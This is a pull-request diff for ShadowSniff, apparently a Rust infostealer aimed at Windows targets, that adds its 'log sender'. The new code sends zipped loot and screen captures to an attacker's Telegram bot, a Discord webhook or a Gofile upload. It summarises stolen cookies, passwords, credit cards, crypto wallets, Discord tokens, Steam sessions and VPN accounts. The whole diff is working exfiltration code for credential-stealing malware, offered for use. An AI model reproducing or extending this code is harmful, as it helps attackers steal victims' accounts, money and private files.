### PR TITLE
feat: log sender

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -279,6 +279,7 @@ dependencies = [
  "collector",
  "derive-new",
  "indoc",
+ "json",
  "requests",
  "utils",
 ]

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -9,6 +9,8 @@ dependencies = [
  "collector",
  "filesystem",
  "ipinfo",
+ "rand_chacha",
+ "rand_core",
  "sender",
  "shadowsniff",
  "tasks",

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -9,6 +9,7 @@ dependencies = [
  "collector",
  "filesystem",
  "ipinfo",
+ "sender",
  "shadowsniff",
  "tasks",
  "utils",
@@ -75,6 +76,17 @@ dependencies = [
  "filesystem",
  "obfstr",
  "utils",
+]
+
+[[package]]
+name = "derive-new"
+version = "0.7.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2cdc8d50f426189eef89dac62fabfa0abb27d5cc008f25bf4156a0203325becc"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn",
 ]
 
 [[package]]
@@ -265,6 +277,10 @@ name = "sender"
 version = "0.1.0"
 dependencies = [
  "collector",
+ "derive-new",
+ "indoc",
+ "requests",
+ "utils",
 ]
 
 [[package]]

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -64,6 +64,7 @@ version = "0.1.0"
 dependencies = [
  "indoc",
  "paste",
+ "spin",
 ]
 
 [[package]]

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -260,6 +260,13 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "94143f37725109f92c262ed2cf5e59bce7498c01bcc1502d7b9afe439a4e9f49"
 
 [[package]]
+name = "sender"
+version = "0.1.0"
+dependencies = [
+ "collector",
+]
+
+[[package]]
 name = "shadowsniff"
 version = "0.1.0"
 dependencies = [

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -21,7 +21,8 @@ members = [
     "collector",
     "zip",
     "filesystem",
-    "regedit"
+    "regedit",
+    "sender"
 ]
 
 [profile.release]

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -47,3 +47,4 @@ ipinfo = { path = "ipinfo" }
 collector = { path = "collector" }
 zip = { path = "zip" }
 filesystem = { path = "filesystem" }
+sender = { path = "sender" }

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -48,3 +48,5 @@ collector = { path = "collector" }
 zip = { path = "zip" }
 filesystem = { path = "filesystem" }
 sender = { path = "sender" }
+rand_chacha = { version = "0.9.0", default-features = false }
+rand_core = { version = "0.9.3", default-features = false }

--- a/README.MD
+++ b/README.MD
@@ -29,7 +29,7 @@ covering all essential data extraction capabilities for Windows targets.
 ### Log Sending
 
 - [ ] Discord webhook
-- [ ] Telegram bot
+- [x] Telegram bot
 
 ### Browsers
 

--- a/README.MD
+++ b/README.MD
@@ -28,7 +28,7 @@ covering all essential data extraction capabilities for Windows targets.
 
 ### Log Sending
 
-- [ ] Discord webhook
+- [x] Discord webhook
 - [x] Telegram bot
 
 ### Browsers

--- a/collector/Cargo.toml
+++ b/collector/Cargo.toml
@@ -6,3 +6,4 @@ edition = "2024"
 [dependencies]
 paste = "1.0.15"
 indoc = "2.0.6"
+spin = "0.10.0"

--- a/collector/src/lib.rs
+++ b/collector/src/lib.rs
@@ -91,9 +91,9 @@ pub trait Collector: Send + Sync {
     fn get_device(&self) -> &Self::Device;
 }
 
-pub struct DisplayCollector<T: Collector>(pub T);
+pub struct DisplayCollector<'a, T: Collector>(pub &'a T);
 
-impl<T: Collector> Display for DisplayCollector<T> {
+impl<T: Collector> Display for DisplayCollector<'_, T> {
     fn fmt(&self, f: &mut Formatter<'_>) -> core::fmt::Result {
         write!(
             f,

--- a/collector/src/lib.rs
+++ b/collector/src/lib.rs
@@ -2,6 +2,7 @@
 
 extern crate alloc;
 
+use alloc::vec::Vec;
 use core::fmt::{Display, Formatter};
 use indoc::indoc;
 
@@ -21,13 +22,20 @@ macro_rules! increase_count {
     };
 }
 
-#[allow(unused_macros)]
 macro_rules! flag {
     ($name:ident) => {
         paste::paste! {
             fn [<set_ $name>](&self);
 
             fn [<is_ $name>](&self) -> bool;
+        }
+    };
+
+    ($name:ident, $ty:ty) => {
+        paste::paste! {
+            fn [<set_ $name>](&self, val: $ty);
+
+            fn [<get_ $name>](&self) -> Option<$ty>;
         }
     };
 }
@@ -62,6 +70,7 @@ pub trait Vpn: Send + Sync {
 
 pub trait Device: Send + Sync {
     increase_count!(wifi_networks);
+    flag!(screenshot, Vec<u8>);
 }
 
 pub trait Collector: Send + Sync {

--- a/sender/Cargo.toml
+++ b/sender/Cargo.toml
@@ -5,3 +5,7 @@ edition = "2024"
 
 [dependencies]
 collector = { path = "../collector" }
+derive-new = "0.7.0"
+indoc = "2.0.6"
+utils = { path = "../utils" }
+requests = { path = "../requests" }

--- a/sender/Cargo.toml
+++ b/sender/Cargo.toml
@@ -9,3 +9,4 @@ derive-new = "0.7.0"
 indoc = "2.0.6"
 utils = { path = "../utils" }
 requests = { path = "../requests" }
+json = { path = "../json" }

--- a/sender/Cargo.toml
+++ b/sender/Cargo.toml
@@ -1,0 +1,7 @@
+[package]
+name = "sender"
+version = "0.1.0"
+edition = "2024"
+
+[dependencies]
+collector = { path = "../collector" }

--- a/sender/src/discord_webhook.rs
+++ b/sender/src/discord_webhook.rs
@@ -1,0 +1,158 @@
+use crate::{LogFile, LogSender, SendError};
+use alloc::string::{String, ToString};
+use alloc::sync::Arc;
+use alloc::{format, vec};
+use collector::{Browser, Collector, Device, FileGrabber, Software, Vpn};
+use derive_new::new;
+use indoc::formatdoc;
+use requests::{BodyRequestBuilder, MultipartBuilder, Request, RequestBuilder};
+use utils::format_size;
+
+#[derive(Clone, new)]
+pub struct DiscordWebhook {
+    webhook: Arc<str>
+}
+
+fn generate_embed<P, C>(log: &LogFile, password: Option<P>, collector: &C) -> String
+where
+    P: AsRef<str>,
+    C: Collector
+{
+    let link = match log {
+        LogFile::ExternalLink((link, size)) => Some(
+            format!(
+                r#"[Download [{size}]]({link})"#,
+                size = format_size(*size as _)
+            )
+        ),
+        LogFile::ZipArchive(_) => None
+    };
+
+    let password = password.map(|password| {
+        let password = password.as_ref();
+        format!(r#"Password: ||{password}||"#)
+    });
+
+    let mut parts = vec![];
+    if let Some(l) = link { parts.push(l); }
+    if let Some(p) = password { parts.push(p); }
+    let description = if parts.is_empty() { "".to_string() } else { parts.join("\\n") };
+
+    formatdoc! {
+        r#"
+        {{
+          "title": "New log",
+          "description": "{description}",
+          "color": 14627378,
+          "fields": [
+            {{
+              "name": "Browser",
+              "value": "```\nCookies: {cookies}\nPasswords: {passwords}\nCredit cards: {credit_cards}\nAuto fills: {auto_fills}\nHistory: {history}\nBookmarks: {bookmarks}\nDownloads: {downloads}\n```",
+              "inline": true
+            }},
+            {{
+              "name": "Software",
+              "value": "```\nWallets: {wallets}\nFtp hosts: {ftp_hosts}\nTelegram: {telegram}\nDiscord tokens: {discord_tokens}\nSteam sessions: {steam_sessions}\n```",
+              "inline": true
+            }},
+            {{
+              "name": "Files",
+              "value": "```\nSource code: {source_code}\nDatabase: {databases}\nDocuments: {documents}\n```"
+            }},
+            {{
+              "name": "Vpn",
+              "value": "```\nAccounts: {vpn_accounts}\n```"
+            }},
+            {{
+              "name": "Device",
+              "value": "```\nWifi networks: {wifi_networks}\n```"
+            }}
+          ],
+          "author": {{
+            "name": "ShadowSniff"
+          }},
+          "footer": {{
+            "text": "ShadowSniff"
+          }}
+        }}"#,
+        cookies = collector.get_browser().get_cookies(),
+        passwords = collector.get_browser().get_passwords(),
+        credit_cards = collector.get_browser().get_credit_cards(),
+        auto_fills = collector.get_browser().get_auto_fills(),
+        history = collector.get_browser().get_history(),
+        bookmarks = collector.get_browser().get_bookmarks(),
+        downloads = collector.get_browser().get_downloads(),
+
+        wallets = collector.get_software().get_wallets(),
+        ftp_hosts = collector.get_software().get_ftp_hosts(),
+        telegram = collector.get_software().is_telegram(),
+        discord_tokens = collector.get_software().get_discord_tokens(),
+        steam_sessions = collector.get_software().get_steam_session(),
+
+        source_code = collector.get_file_grabber().get_source_code_files(),
+        databases = collector.get_file_grabber().get_database_files(),
+        documents = collector.get_file_grabber().get_documents(),
+
+        vpn_accounts = collector.get_vpn().get_accounts(),
+
+        wifi_networks = collector.get_device().get_wifi_networks()
+    }
+}
+
+impl DiscordWebhook {
+    fn send_multipart(&self, builder: MultipartBuilder) -> Result<(), SendError> {
+        let content_type = builder.content_type();
+        let body = builder.finish();
+
+        Request::post(self.webhook.to_string())
+            .header("Content-Type", &content_type)
+            .body(body)
+            .build()
+            .send()
+            .ok()
+            .ok_or(SendError::Network)?;
+
+        Ok(())
+    }
+}
+
+impl LogSender for DiscordWebhook {
+    fn send<P, C>(&self, log_file: LogFile, password: Option<P>, collector: &C) -> Result<(), SendError>
+    where
+        P: AsRef<str> + Clone,
+        C: Collector
+    {
+        if let LogFile::ZipArchive(archive) = &log_file
+            && archive.len() >= 8 * 1024 * 1024 // 8 MB
+        {
+            return Err(SendError::LogFileTooBig)
+        }
+
+        if let Some(screenshot) = collector.get_device().get_screenshot() {
+            let mut builder = MultipartBuilder::new("----Multipart");
+            builder.write_file_field("file", "screenshot.png", "image/png", &screenshot);
+            builder.write_text_field("payload_json", r#"{"content": ""}"#);
+            self.send_multipart(builder)?;
+        }
+
+        let payload = formatdoc! {
+            r#"{{
+                "content": "",
+                "embeds": [
+                    {embed}
+                ]
+            }}"#,
+            embed = generate_embed(&log_file, password, collector),
+        };
+
+        let mut builder = MultipartBuilder::new("----Multipart");
+        if let LogFile::ZipArchive(archive) = log_file {
+            builder.write_file_field("file", "log.zip", "application/zip", &archive);
+        }
+
+        builder.write_text_field("payload_json", &payload);
+        self.send_multipart(builder)?;
+
+        Ok(())
+    }
+}

--- a/sender/src/gofile.rs
+++ b/sender/src/gofile.rs
@@ -1,0 +1,59 @@
+use crate::{LogFile, LogSender, SendError};
+use alloc::string::String;
+use alloc::vec::Vec;
+use collector::Collector;
+use derive_new::new;
+use json::parse;
+use requests::{BodyRequestBuilder, MultipartBuilder, Request, RequestBuilder};
+
+/// Gofile uploader wrapper around an inner [`LogSender`].
+///
+/// If the log is a zipped archive ([`LogFile::ZipArchive`]), this struct uploads it to
+/// Gofile and then invokes the inner sender with [`LogFile::ExternalLink`].
+#[derive(new, Clone)]
+pub struct Gofile<T: LogSender> {
+    inner: T
+}
+
+fn upload(name: &str, bytes: Vec<u8>) -> Option<String> {
+    let mut builder = MultipartBuilder::new("----Multipart");
+    builder.write_file_field("file", name, "application/zip", &bytes);
+
+    let content_type = builder.content_type();
+    let body = builder.finish();
+
+    let response = Request::post("https://upload.gofile.io/uploadFile")
+        .header("Content-Type", &content_type)
+        .body(body)
+        .build()
+        .send()
+        .ok()?;
+
+    Some(
+        parse(response.body())
+            .ok()
+            ?.get("data")
+            ?.get("downloadPage")
+            ?.as_string()
+            ?.clone()
+    )
+}
+
+impl<T: LogSender> LogSender for Gofile<T> {
+    fn send<P, C>(&self, zip_archive: LogFile, password: Option<P>, collector: &C) -> Result<(), SendError>
+    where
+        P: AsRef<str>,
+        C: Collector
+    {
+        match zip_archive {
+            LogFile::ExternalLink(_) => self.inner.send(zip_archive, password, collector),
+            LogFile::ZipArchive(archive) => {
+                let size = archive.len();
+                let link = upload("log.zip", archive)
+                    .ok_or(SendError::Network)?;
+
+                self.inner.send(LogFile::ExternalLink((link, size)), password, collector)
+            }
+        }
+    }
+}

--- a/sender/src/gofile.rs
+++ b/sender/src/gofile.rs
@@ -40,13 +40,13 @@ fn upload(name: &str, bytes: Vec<u8>) -> Option<String> {
 }
 
 impl<T: LogSender> LogSender for Gofile<T> {
-    fn send<P, C>(&self, zip_archive: LogFile, password: Option<P>, collector: &C) -> Result<(), SendError>
+    fn send<P, C>(&self, log_file: LogFile, password: Option<P>, collector: &C) -> Result<(), SendError>
     where
         P: AsRef<str>,
         C: Collector
     {
-        match zip_archive {
-            LogFile::ExternalLink(_) => self.inner.send(zip_archive, password, collector),
+        match log_file {
+            LogFile::ExternalLink(_) => self.inner.send(log_file, password, collector),
             LogFile::ZipArchive(archive) => {
                 let size = archive.len();
                 let link = upload("log.zip", archive)

--- a/sender/src/gofile.rs
+++ b/sender/src/gofile.rs
@@ -42,7 +42,7 @@ fn upload(name: &str, bytes: Vec<u8>) -> Option<String> {
 impl<T: LogSender> LogSender for Gofile<T> {
     fn send<P, C>(&self, log_file: LogFile, password: Option<P>, collector: &C) -> Result<(), SendError>
     where
-        P: AsRef<str>,
+        P: AsRef<str> + Clone,
         C: Collector
     {
         match log_file {

--- a/sender/src/lib.rs
+++ b/sender/src/lib.rs
@@ -2,6 +2,7 @@
 
 extern crate alloc;
 pub mod telegram_bot;
+pub mod gofile;
 
 use alloc::string::String;
 use alloc::vec::Vec;
@@ -26,7 +27,7 @@ pub enum LogFile {
 }
 
 /// A trait for sending log files to a destination service.
-pub trait LogSender {
+pub trait LogSender: Clone {
     /// Sends a log file to the destination service.
     ///
     /// # Parameters

--- a/sender/src/lib.rs
+++ b/sender/src/lib.rs
@@ -7,23 +7,35 @@ use alloc::vec::Vec;
 use collector::Collector;
 
 pub enum SendError {
-    NetworkError
+    NetworkError,
+    UnsupportedLogFileError
+}
+
+/// Represents a log file to be sent or processed.
+pub enum LogFile {
+    /// A tuple containing:
+    /// - A URL pointing to a `.zip` log archive.
+    /// - The size of the log file in bytes.
+    ExternalLink((String, usize)),
+
+    /// The raw bytes of a `.zip` log archive.
+    ZipArchive(Vec<u8>)
 }
 
 /// A trait for sending log files to a destination service.
 pub trait LogSender {
-    /// Sends a zipped log archive to the destination service.
+    /// Sends a log file to the destination service.
     ///
     /// # Parameters
     ///
-    /// - `zip_archive`: A [`Vec<u8>`] representing the bytes of the `.zip` archive containing the log files.
+    /// - `zip_archive`: A [`LogFile`] enum representing the log file to send.
     /// - `password`: An [`Option<String>`] that specifies the password for the archive, if it is password-protected.
     /// - `collector`: A type that implements the [`Collector`] trait, providing log-related metadata or additional context.
     ///
     /// # Returns
     ///
     /// - `Result<(), SendError>`: Returns `Ok(())` if the log was sent successfully, or a [`SendError`] if the operation failed.
-    fn send<C>(&self, zip_archive: Vec<u8>, password: Option<String>, collector: C) -> Result<(), SendError>
+    fn send<C>(&self, zip_archive: LogFile, password: Option<String>, collector: C) -> Result<(), SendError>
     where
         C: Collector;
 }

--- a/sender/src/lib.rs
+++ b/sender/src/lib.rs
@@ -3,6 +3,7 @@
 extern crate alloc;
 pub mod telegram_bot;
 pub mod gofile;
+pub mod size_fallback;
 
 use alloc::string::String;
 use alloc::vec::Vec;
@@ -16,6 +17,7 @@ pub enum SendError {
 }
 
 /// Represents a log file to be sent or processed.
+#[derive(Clone)]
 pub enum LogFile {
     /// A tuple containing:
     /// - A URL pointing to a `.zip` log archive.
@@ -47,6 +49,6 @@ pub trait LogSender: Clone {
     /// - `Result<(), SendError>`: Returns `Ok(())` if the log was sent successfully, or a [`SendError`] if the operation failed.
     fn send<P, C>(&self, log_file: LogFile, password: Option<P>, collector: &C) -> Result<(), SendError>
     where
-        P: AsRef<str>,
+        P: AsRef<str> + Clone,
         C: Collector;
 }

--- a/sender/src/lib.rs
+++ b/sender/src/lib.rs
@@ -7,8 +7,9 @@ use alloc::vec::Vec;
 use collector::Collector;
 
 pub enum SendError {
-    NetworkError,
-    UnsupportedLogFileError
+    Network,
+    UnsupportedLogFile,
+    LogFileTooBig
 }
 
 /// Represents a log file to be sent or processed.

--- a/sender/src/lib.rs
+++ b/sender/src/lib.rs
@@ -1,11 +1,13 @@
 #![no_std]
 
 extern crate alloc;
+pub mod telegram_bot;
 
 use alloc::string::String;
 use alloc::vec::Vec;
 use collector::Collector;
 
+#[derive(Debug)]
 pub enum SendError {
     Network,
     UnsupportedLogFile,
@@ -36,7 +38,8 @@ pub trait LogSender {
     /// # Returns
     ///
     /// - `Result<(), SendError>`: Returns `Ok(())` if the log was sent successfully, or a [`SendError`] if the operation failed.
-    fn send<C>(&self, zip_archive: LogFile, password: Option<String>, collector: C) -> Result<(), SendError>
+    fn send<P, C>(&self, zip_archive: LogFile, password: Option<P>, collector: &C) -> Result<(), SendError>
     where
+        P: AsRef<str>,
         C: Collector;
 }

--- a/sender/src/lib.rs
+++ b/sender/src/lib.rs
@@ -26,20 +26,26 @@ pub enum LogFile {
     ZipArchive(Vec<u8>)
 }
 
+impl From<Vec<u8>> for LogFile {
+    fn from(value: Vec<u8>) -> Self {
+        LogFile::ZipArchive(value)
+    }
+}
+
 /// A trait for sending log files to a destination service.
 pub trait LogSender: Clone {
     /// Sends a log file to the destination service.
     ///
     /// # Parameters
     ///
-    /// - `zip_archive`: A [`LogFile`] enum representing the log file to send.
+    /// - `log_file`: A [`LogFile`] enum representing the log file to send.
     /// - `password`: An [`Option<String>`] that specifies the password for the archive, if it is password-protected.
     /// - `collector`: A type that implements the [`Collector`] trait, providing log-related metadata or additional context.
     ///
     /// # Returns
     ///
     /// - `Result<(), SendError>`: Returns `Ok(())` if the log was sent successfully, or a [`SendError`] if the operation failed.
-    fn send<P, C>(&self, zip_archive: LogFile, password: Option<P>, collector: &C) -> Result<(), SendError>
+    fn send<P, C>(&self, log_file: LogFile, password: Option<P>, collector: &C) -> Result<(), SendError>
     where
         P: AsRef<str>,
         C: Collector;

--- a/sender/src/lib.rs
+++ b/sender/src/lib.rs
@@ -4,6 +4,7 @@ extern crate alloc;
 pub mod telegram_bot;
 pub mod gofile;
 pub mod size_fallback;
+pub mod discord_webhook;
 
 use alloc::string::String;
 use alloc::vec::Vec;

--- a/sender/src/lib.rs
+++ b/sender/src/lib.rs
@@ -1,0 +1,29 @@
+#![no_std]
+
+extern crate alloc;
+
+use alloc::string::String;
+use alloc::vec::Vec;
+use collector::Collector;
+
+pub enum SendError {
+    NetworkError
+}
+
+/// A trait for sending log files to a destination service.
+pub trait LogSender {
+    /// Sends a zipped log archive to the destination service.
+    ///
+    /// # Parameters
+    ///
+    /// - `zip_archive`: A [`Vec<u8>`] representing the bytes of the `.zip` archive containing the log files.
+    /// - `password`: An [`Option<String>`] that specifies the password for the archive, if it is password-protected.
+    /// - `collector`: A type that implements the [`Collector`] trait, providing log-related metadata or additional context.
+    ///
+    /// # Returns
+    ///
+    /// - `Result<(), SendError>`: Returns `Ok(())` if the log was sent successfully, or a [`SendError`] if the operation failed.
+    fn send<C>(&self, zip_archive: Vec<u8>, password: Option<String>, collector: C) -> Result<(), SendError>
+    where
+        C: Collector;
+}

--- a/sender/src/size_fallback.rs
+++ b/sender/src/size_fallback.rs
@@ -1,0 +1,44 @@
+use crate::{LogFile, LogSender, SendError};
+use collector::Collector;
+use derive_new::new;
+
+/// A log sender that attempts to send using a primary sender and falls back to another
+/// if the log file is too large.
+///
+/// [`SizeFallbackLogFile`] wraps two log senders: a `primary` and a `fallback`. When
+/// sending a log file, it first tries the `primary` sender. If the primary fails
+/// with [`SendError::LogFileTooBig`], it retries the operation using the `fallback` sender.
+///
+/// # Type Parameters
+/// - `Primary`: A type that implements the [`LogSender`] trait and serves as the first attempt.
+/// - `Fallback`: A type that also implements [`LogSender`] and is used when the primary fails
+///   due to size constraints.
+#[derive(Clone, new)]
+pub struct SizeFallbackLogFile<Primary, Fallback>
+where
+    Primary: LogSender,
+    Fallback: LogSender,
+{
+    primary: Primary,
+    fallback: Fallback,
+}
+
+impl<Primary, Fallback> LogSender for SizeFallbackLogFile<Primary, Fallback>
+where
+    Primary: LogSender,
+    Fallback: LogSender,
+{
+    fn send<P, C>(&self, log_file: LogFile, password: Option<P>, collector: &C) -> Result<(), SendError>
+    where
+        P: AsRef<str> + Clone,
+        C: Collector
+    {
+        match self.primary.send(log_file.clone(), password.clone(), collector) {
+            Ok(_) => Ok(()),
+            Err(SendError::LogFileTooBig) => {
+                self.fallback.send(log_file, password, collector)
+            },
+            Err(e) => Err(e),
+        }
+    }
+}

--- a/sender/src/telegram_bot.rs
+++ b/sender/src/telegram_bot.rs
@@ -178,20 +178,20 @@ impl TelegramBot {
 
 fn combine_caption_and_thumbnail(caption: &str, thumbnail: Option<String>) -> String {
     match thumbnail {
-        Some(tn) if !tn.is_empty() => format!("{}\n{}", caption, tn),
+        Some(tn) if !tn.is_empty() => format!("{caption}\n{tn}"),
         _ => caption.to_string(),
     }
 }
 
 impl LogSender for TelegramBot {
-    fn send<P, C>(&self, zip_archive: LogFile, password: Option<P>, collector: &C) -> Result<(), SendError>
+    fn send<P, C>(&self, log_file: LogFile, password: Option<P>, collector: &C) -> Result<(), SendError>
     where
         P: AsRef<str>,
         C: Collector
     {
-        let (caption, thumbnail) = generate_caption(&zip_archive, password, collector);
+        let (caption, thumbnail) = generate_caption(&log_file, password, collector);
 
-        match zip_archive {
+        match log_file {
             LogFile::ZipArchive(archive) => self.send_as_file(
                 archive,
                 collector.get_device().get_screenshot(),

--- a/sender/src/telegram_bot.rs
+++ b/sender/src/telegram_bot.rs
@@ -1,0 +1,208 @@
+use crate::{LogFile, LogSender, SendError};
+use alloc::string::{String, ToString};
+use alloc::sync::Arc;
+use alloc::vec::Vec;
+use alloc::{format, vec};
+use collector::{Collector, Device, DisplayCollector};
+use derive_new::new;
+use requests::{BodyRequestBuilder, MultipartBuilder, Request, RequestBuilder};
+use utils::format_size;
+
+#[derive(new)]
+pub struct TelegramBot {
+    chat_id: Arc<str>,
+    token: Arc<str>
+}
+
+fn generate_caption<P, C>(log: &LogFile, password: Option<P>, collector: &C) -> (String, Option<String>)
+where
+    P: AsRef<str>,
+    C: Collector
+{
+    let caption = DisplayCollector(collector).to_string();
+
+    let link = match log {
+        LogFile::ExternalLink((link, size)) => Some(
+            format!(
+                r#"<a href="{}">Download [{}]</a>"#,
+                link,
+                format_size(*size as _)
+            )
+        ),
+        LogFile::ZipArchive(_) => None
+    };
+
+    let password = password.map(|password| {
+        let password = password.as_ref();
+        format!(r#"Password: <span class="tg-spoiler">{password}</span>"#)
+    });
+
+    let mut parts = vec![];
+    if let Some(l) = link { parts.push(l); }
+    if let Some(p) = password { parts.push(p); }
+    let thumbnail = if parts.is_empty() { None } else { Some(parts.join(" ")) };
+
+    (caption, thumbnail)
+}
+
+pub struct MediaGroup {
+    items: Vec<MediaItem>,
+}
+
+pub struct MediaItem {
+    media_type: String,
+    media: String,
+    caption: Option<String>,
+    parse_mode: Option<String>,
+}
+
+impl MediaGroup {
+    pub fn new() -> Self {
+        Self { items: Vec::new() }
+    }
+
+    pub fn add_document(&mut self, media_name: impl Into<String>, caption: Option<String>) -> &mut Self {
+        self.items.push(MediaItem {
+            media_type: "document".to_string(),
+            media: format!("attach://{}", media_name.into()),
+            caption,
+            parse_mode: Some("HTML".to_string()),
+        });
+        self
+    }
+
+    pub fn add_photo(&mut self, media_name: impl Into<String>, caption: Option<String>) -> &mut Self {
+        self.items.push(MediaItem {
+            media_type: "photo".to_string(),
+            media: format!("attach://{}", media_name.into()),
+            caption,
+            parse_mode: Some("HTML".to_string()),
+        });
+        self
+    }
+
+    pub fn to_string(&self) -> String {
+        let mut json_parts = Vec::new();
+
+        for item in &self.items {
+            let mut fields = vec![
+                format!(r#""type": "{}""#, item.media_type),
+                format!(r#""media": "{}""#, item.media),
+            ];
+
+            if let Some(caption) = &item.caption {
+                let escaped = caption.replace('\\', "\\\\").replace('"', "\\\"");
+                fields.push(format!(r#""caption": "{}""#, escaped));
+            }
+
+            if let Some(parse_mode) = &item.parse_mode {
+                fields.push(format!(r#""parse_mode": "{}""#, parse_mode));
+            }
+
+            let obj = format!("{{{}}}", fields.join(","));
+            json_parts.push(obj);
+        }
+
+        format!("[{}]", json_parts.join(","))
+    }
+}
+
+impl TelegramBot {
+    fn send_as_file(&self, archive: Vec<u8>, screenshot: Option<Vec<u8>>, caption: String, thumbnail: Option<String>) -> Result<(), SendError> {
+        let mut builder = MultipartBuilder::new("----BoundaryMediaGroup");
+
+        builder.write_text_field("chat_id", &self.chat_id);
+
+        let mut media_group = MediaGroup::new();
+
+        if let Some(screenshot_bytes) = &screenshot {
+            media_group.add_document("screenshot", Some(caption));
+            media_group.add_document("logfile", thumbnail);
+
+            builder.write_file_field("screenshot", "screenshot.png", "image/png", screenshot_bytes);
+        } else {
+            let combined_caption = combine_caption_and_thumbnail(&caption, thumbnail);
+            media_group.add_document("logfile", Some(combined_caption));
+        }
+
+        let media_json = media_group.to_string();
+
+        builder.write_text_field("media", &media_json);
+        builder.write_file_field("logfile", "log.zip", "application/zip", &archive);
+
+        self.send_request("sendMediaGroup", builder)?;
+
+        Ok(())
+    }
+
+    fn send_as_link(&self, screenshot: Option<Vec<u8>>, caption: String, thumbnail: Option<String>) -> Result<(), SendError> {
+        let combined_caption = combine_caption_and_thumbnail(&caption, thumbnail);
+
+        match screenshot {
+            Some(photo_bytes) => {
+                let mut builder = MultipartBuilder::new("----BoundaryPhoto");
+                builder.write_text_field("chat_id", &self.chat_id);
+                builder.write_text_field("caption", &combined_caption);
+                builder.write_text_field("parse_mode", "HTML");
+                builder.write_file_field("photo", "screenshot.png", "image/png", &photo_bytes);
+
+                self.send_request("sendPhoto", builder)?
+            }
+            None => {
+                let mut builder = MultipartBuilder::new("----BoundaryPhoto");
+                builder.write_text_field("chat_id", &self.chat_id);
+                builder.write_text_field("text", &combined_caption);
+                builder.write_text_field("parse_mode", "HTML");
+
+                self.send_request("sendMessage", builder)?
+            }
+        }
+
+        Ok(())
+    }
+
+    fn send_request(&self, method: &str, body: MultipartBuilder) -> Result<(), SendError> {
+        let content_type = body.content_type();
+        let body = body.finish();
+
+        Request::post(format!("https://api.telegram.org/bot{}/{}", self.token, method))
+            .header("Content-Type", &content_type)
+            .body(body)
+            .build()
+            .send()
+            .ok().ok_or(SendError::Network)?;
+
+        Ok(())
+    }
+}
+
+fn combine_caption_and_thumbnail(caption: &str, thumbnail: Option<String>) -> String {
+    match thumbnail {
+        Some(tn) if !tn.is_empty() => format!("{}\n{}", caption, tn),
+        _ => caption.to_string(),
+    }
+}
+
+impl LogSender for TelegramBot {
+    fn send<P, C>(&self, zip_archive: LogFile, password: Option<P>, collector: &C) -> Result<(), SendError>
+    where
+        P: AsRef<str>,
+        C: Collector
+    {
+        let (caption, thumbnail) = generate_caption(&zip_archive, password, collector);
+
+        match zip_archive {
+            LogFile::ZipArchive(archive) => self.send_as_file(
+                archive,
+                collector.get_device().get_screenshot(),
+                caption,
+                thumbnail
+            ),
+            LogFile::ExternalLink(_) => self.send_as_link(
+                collector.get_device().get_screenshot(),
+                caption,
+                thumbnail
+            )
+        }
+    }
+}

--- a/sender/src/telegram_bot.rs
+++ b/sender/src/telegram_bot.rs
@@ -186,7 +186,7 @@ fn combine_caption_and_thumbnail(caption: &str, thumbnail: Option<String>) -> St
 impl LogSender for TelegramBot {
     fn send<P, C>(&self, log_file: LogFile, password: Option<P>, collector: &C) -> Result<(), SendError>
     where
-        P: AsRef<str>,
+        P: AsRef<str> + Clone,
         C: Collector
     {
         let (caption, thumbnail) = generate_caption(&log_file, password, collector);

--- a/shadowsniff/messengers/src/lib.rs
+++ b/shadowsniff/messengers/src/lib.rs
@@ -13,6 +13,8 @@ use collector::Collector;
 use filesystem::FileSystem;
 use tasks::{composite_task, impl_composite_task_runner, CompositeTask, Task};
 
+pub const VERSION: &str = env!("CARGO_PKG_VERSION");
+
 pub struct MessengersTask<C: Collector, F: FileSystem> {
     inner: CompositeTask<C, F>,
 }

--- a/shadowsniff/src/screenshot.rs
+++ b/shadowsniff/src/screenshot.rs
@@ -8,7 +8,7 @@ use filesystem::path::Path;
 use miniz_oxide::deflate::compress_to_vec_zlib;
 use tasks::{parent_name, Task};
 
-use collector::Collector;
+use collector::{Collector, Device};
 use filesystem::{FileSystem, WriteTo};
 use windows_sys::Win32::Graphics::Gdi::{
     BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, CreateDCW, DeleteDC, DeleteObject,
@@ -23,13 +23,15 @@ pub(super) struct ScreenshotTask;
 impl<C: Collector, F: FileSystem> Task<C, F> for ScreenshotTask {
     parent_name!("Screenshot.png");
 
-    fn run(&self, parent: &Path, filesystem: &F, _: &C) {
+    fn run(&self, parent: &Path, filesystem: &F, collector: &C) {
         let Ok((width, height, pixels)) = capture_screen() else {
             return;
         };
 
         let png = create_png(width as u32, height as u32, &pixels);
-        let _ = png.write_to(filesystem, parent);
+        let _ = &png.write_to(filesystem, parent);
+
+        collector.get_device().set_screenshot(png);
     }
 }
 

--- a/src/main.rs
+++ b/src/main.rs
@@ -17,7 +17,7 @@ use filesystem::FileSystem;
 use ipinfo::init_ip_info;
 use sender::gofile::Gofile;
 use sender::telegram_bot::TelegramBot;
-use sender::{LogFile, LogSender};
+use sender::LogSender;
 use shadowsniff::SniffTask;
 use tasks::Task;
 use utils::log_debug;
@@ -63,7 +63,7 @@ pub fn main(_argc: i32, _argv: *const *const u8) -> i32 {
     let telegram = TelegramBot::new(Arc::from(env!("TELEGRAM_CHAT_ID")), Arc::from(env!("TELEGRAM_BOT_TOKEN")));
 
     Gofile::new(telegram)
-        .send(LogFile::ZipArchive(zip), Some(password), &collector)
+        .send(zip.into(), Some(password), &collector)
         .unwrap();
 
     0

--- a/src/main.rs
+++ b/src/main.rs
@@ -7,15 +7,20 @@
 extern crate alloc;
 
 use alloc::format;
+use alloc::string::ToString;
+use alloc::sync::Arc;
 use collector::atomic::AtomicCollector;
 use collector::DisplayCollector;
 use filesystem::path::Path;
-use filesystem::storage::StorageFileSystem;
-use filesystem::{FileSystem, FileSystemExt};
+use filesystem::virtualfs::VirtualFileSystem;
+use filesystem::FileSystem;
 use ipinfo::init_ip_info;
+use sender::telegram_bot::TelegramBot;
+use sender::{LogFile, LogSender};
 use shadowsniff::SniffTask;
 use tasks::Task;
 use utils::log_debug;
